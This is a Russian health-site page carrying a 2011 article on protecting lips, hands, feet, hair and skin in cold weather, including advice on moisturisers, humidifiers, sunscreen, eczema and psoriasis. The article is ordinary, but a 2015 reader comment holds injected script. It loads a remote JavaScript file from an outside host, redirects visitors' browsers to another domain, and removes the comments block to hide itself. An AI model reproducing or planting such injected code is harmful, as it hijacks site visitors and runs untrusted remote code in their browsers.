Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Опасности, которые подсте...  >>  Опасности, которые подстерегают вашу кожу в межсезонье
 
Обратная связь
 

Опасности, которые подстерегают вашу кожу в межсезонье

Размер шрифта
04 марта 2011 00:00
  • google_analytics: false
  • Нравится

Некогда гладкая и сияющая кожа теперь не дает покоя, зудит и шелушится? Существует масса вещей, которые способны «ограбить» вашу кожу, лишив ее защитных масел. В результате проблемы дают о себе знать по всему телу – от потрескавшихся губ до огрубевших пяток. Используйте это простое руководство, чтобы защитить свою кожу в холодную погоду и всегда оставаться красивой.

Спасите наши губы

Потрескавшиеся губы способны обезобразить самое красивое лицо. Покрытая коркой кожа лопается, открывая вход микробам. Пейте много воды, чтобы избежать обезвоживания организма, и используйте увлажнитель у себя дома. Обильно наносите на губы бальзам или гигиеническую помаду. Косметологи также рекомендуют каждый раз, когда вы идете на улицу использовать блеск или помаду с солнцезащитным фактором. Избегайте длительного пребывания на солнце и при сильном ветре. И ни в коем случае не облизывайте свои губы – это дает лишь кратковременное облегчение, на самом деле лишь ухудшая состояние потрескавшихся губ.

Пустыня на ступнях

Болезненные трещины на пятках – привычная проблема для многих, особенно в зимнее время и в начале весны. Их появление обусловлено сухостью кожей. Мозоли по краю ступни способны усугубить проблему. Если трещины глубокие, может возникнуть заражение и тогда ходить будет очень больно. Поэтому тщательно следите за здоровьем ног, в случае на ночь обильно смазывайте их увлажняющим кремом и надевайте хлопчатобумажные носки. Улучшение должно наступить уже после третьего раза.

Руки заслуживают лучшего

Ваши руки могут сильно пострадать от холодного воздуха и ветра. Частое мытье рук может помочь предотвратить заражение вирусами простуды и гриппа, но обезвоживает кожу. Надеваете перчатки каждый раз, когда вы выходите на улицу, даже. Если вам кажется, что «уже потеплело», так как руки больше других частей вашего тела восприимчивы к холоду. Регулярно смазывайте их увлажняющим кремом на основе глицерина – каждый раз, когда вы просыпаетесь, прежде чем идете спать, и в любое время в течение дня, если чувствуете стянутость или раздражение кожи.

Вооружитесь увлажняющим мылом

Очищающие средства, которые вы используете весной и летом, могут не подходить вашей коже зимой. Откажитесь от агрессивных гелей для умывания, скрабов и спиртовых лосьонов. Для очистки лица, выберите нежное с увлажняющими маслами мыло. Используйте тональный крем с эффектом увлажнения или вовсе откажитесь от этого средства. Помочь сухой коже могут средства, содержащие мочевину, диметикон, глицерин, ланолин и минеральное масло.

А какой у вас крем?

Должны ли вы поменять свой увлажняющий крем? Возможно. Если обычно вы используете легкий лосьон, попробуйте более тяжелые сливки, по крайней мере, на самых сухих участках вашей кожи. Вазелин, например, содержит огромное количество масел, больше чем крема и лосьоны. Но он делает кожу жирной, поэтому его лучше использовать для ног или на очень сухих местах. Его следует наносить на кожу в очень небольшом объеме, мягко, но тщательно втирать. Применять после теплого душа.

«Расшифруйте» увлажняющий крем

Такие увлажнители как мочевина, гиалуроновая кислота, пропиленгликоль – впитывают воду из воздуха. Но они безмаслянные. Смягчающие средства, такие как детское или минеральное масло, растительные масла – например, масло жожоба, ланолин, стеариновая кислота – помогут вашей коже восполнить потерю масла. Многие увлажнители содержат комбинацию вышеперечисленных веществ. Но теми, что содержат ретиноиды, лучше не пользоваться в холодное время – они могут вызвать еще большее раздражение уже сухой, чувствительной кожи.

Оживите свою кожу

Чтобы получить максимальный эффект от увлажняющего крема, регулярно используйте скраб. Мертвые клетки препятствуют проникновению косметических средств в кожу. Хороший результат дает использования два средства в одном – увлажняющего крема, который содержит молочную или салициловую кислоту. Они безопасно и мягко избавляют кожу от ненужных клеток. Агрессивные очищающие маски могут вызвать раздражение – поэтому сначала нанесите их на небольшой участок кожи и проследите за реакцией. Если кожа очень сухая или раздраженная, проконсультируйтесь с косметологом, прежде чем применять новый продукт.

Весенний дождь

Короткий душ поможет увлажнить вашу кожу. Продолжительный, горячий душ, наоборот, высушивает вашу кожу. Но это совсем не значит, что прохладным утром вы должны стоять в ванной под струей ледяной воды. Слегка прохладный душ – самый лучший выбор, ведь он не «стирает» с кожи ее естественное увлажнение.

Запираем влагу на замок

Сразу после ванны, носите на кожу увлажняющий крем – это предотвратит появление сухости. Средства на основе глицерина или гиалуроновой кислоты могут обогатить вашу кожу влагой. Детское или минеральное масло – отличный вариант, потому что они предотвращают испарение влаги с поверхности кожи.

Включите увлажнитель

На улице холодно, а дома тепло. Но сухой воздух помещений может негативно сказаться на вашей коже. Используйте увлажнитель воздуха, чтобы восстановить влажность в квартире или в офисе. В большинстве аптек вы можете найти недорогие модели. Установите увлажнитель в вашей спальне. Еще лучше, если вы сможете купить два или три устройства. Разместите их там, где вы проводите больше всего времени.

Берегите волосы

Мойте волосы не каждый день, а через день. Таким образом, вы убережете их от ломкости и пересушивания, ведь шампуни лишают волосы влаги. Применяйте кондиционер, чтобы сохранить волосы блестящими и мягкими. Не злоупотребляйте феном и выпрямителем волос. И обязательно носите в холодное время головной убор.

Солнцезащитный крем даже если холодно

Думаете, что зимой или ранней весной вы не можете загореть? Ошибаетесь. Снег прекрасно отражает солнечные лучи. На самом деле, зимой 80% солнечных лучей возвращается к вам, в то время как от песка и прибоя можно получить только 20%. Даже если вы не поклонник сноуборда, все равно пользуйтесь солнцезащитным кремом для лица с SPF 20 и больше.

Атака сухой кожи

Кожа, которая испытывает дефицит влаги, начинает зудеть. Снять неприятные ощущения можно, приняв теплую ванну и обильно увлажнив кожу кремом. Также избегайте ношения одежды из грубых материалов. Если эти методы не улучшают ситуацию, обратитесь к дерматологу. Так как причиной сухости и шелушения может быть экзема и псориаз, а такие случаи требующий дифференцированного подхода.

Предупредите экзему

Экзема – общий термин для различных видов воспаления кожи. Она характеризуется сухостью и покраснением, а также зудом. На холоде экзема может обостряться. Опередите ее – пользуйтесь увлажняющим кремом на масляной основе, желательно с солнцезащитным фильтром. Усиленное потоотделение и перегрев также могут вызвать зуд, поэтому одевайтесь в одежду из натуральных тканей.

Дайте отпор псориазу

При псориазе кожа более чем сухая. Это происходит, когда иммунная система дает осечку и ускоряет цикл роста клеток кожи. Сухой воздух, недостаток солнечного света и низкие температуры могут ухудшить псориаз. Следуйте простым советам: короткий теплый душ, много увлажняющего крема и увлажнители воздуха по всему дому. Узнайте у дерматолога о фототерапии – использовании ультрафиолетового лучей B спектра, чтобы замедлить рост клеток.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:17

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Почему у вас сохнут губы   Новогодние подарки для вашей кожи   Вы чешетесь из-за вашего дома   Почему если почесать, то снова чешется?  

Слайдшоу

1
Что есть зимой для кожи
Вы неправильно моете лицо! Как надо?
Как сделать руки моложе

Тесты

Как выявить контактный дерматит?
Мифы о прыщах
Профессиональный оценщик кожи
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.